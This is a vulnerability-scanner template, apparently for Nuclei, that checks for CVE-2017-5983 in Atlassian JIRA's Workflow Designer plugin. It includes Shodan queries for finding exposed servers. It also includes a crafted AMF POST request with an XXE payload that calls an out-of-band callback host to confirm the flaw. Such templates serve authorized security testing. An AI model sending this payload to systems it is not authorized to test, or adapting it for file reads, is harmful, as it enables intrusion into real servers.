The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
PoC代码[已公开]
id: CVE-2017-5983
info:
name: JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
author: us3r777,Synacktiv
severity: critical
description: |
The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5983
- https://code-white.com/blog/2017-04-amf/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-5983
cwe-id: CWE-502
epss-score: 0.08385
epss-percentile: 0.91979
cpe: cpe:2.3:a:atlassian:jira:4.2.4:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: atlassian
product: jira
shodan-query:
- http.title:"system dashboard - jira"
- cpe:"cpe:2.3:a:atlassian:jira"
- http.component:"atlassian confluence"
- http.component:"atlassian jira"
tags: cve,cve2017,jira,amf,rce,xxe,vuln
variables:
version: "\x00\x00"
header_count: "\x00\x00"
message_count: "\x00\x01"
target_uri: "test"
target_uri_len: "\x00\x04"
response_uri: "test"
response_uri_len: "\x00\x04"
xml_marker: "\x0f"
xxe_payload: '<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://{{interactsh-url}}/amf"> %ext; ]>'
int: "0000"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/secure/Dashboard.jspa"
- "{{BaseURL}}/jira/secure/Dashboard.jspa"
- "{{BaseURL}}/login.jsp"
stop-at-first-match: true
host-redirects: true
matchers:
- type: word
part: body
words:
- 'title="JiraVersion"'
internal: true
- raw:
- |
POST /plugins/servlet/jwd/amf/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
Content-Length: {{len(xxe_payload)+29}}
{{version}}{{header_count}}{{message_count}}{{target_uri_len}}{{target_uri}}{{response_uri_len}}{{response_uri}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(int,xml_marker,xxe_payload)))))}}{{xml_marker}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(xxe_payload)))))}}{{xxe_payload}}
unsafe: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 490a0046304402207e9e69e65e82b53f4a8a2aa88cbf94af08fe11431be6829a687e86f7d7f6a1270220155f064239e741d1799a609780e29130179919a5b277ed3ffb248fd430467c59:922c64590222798bb761d5b6d8e72950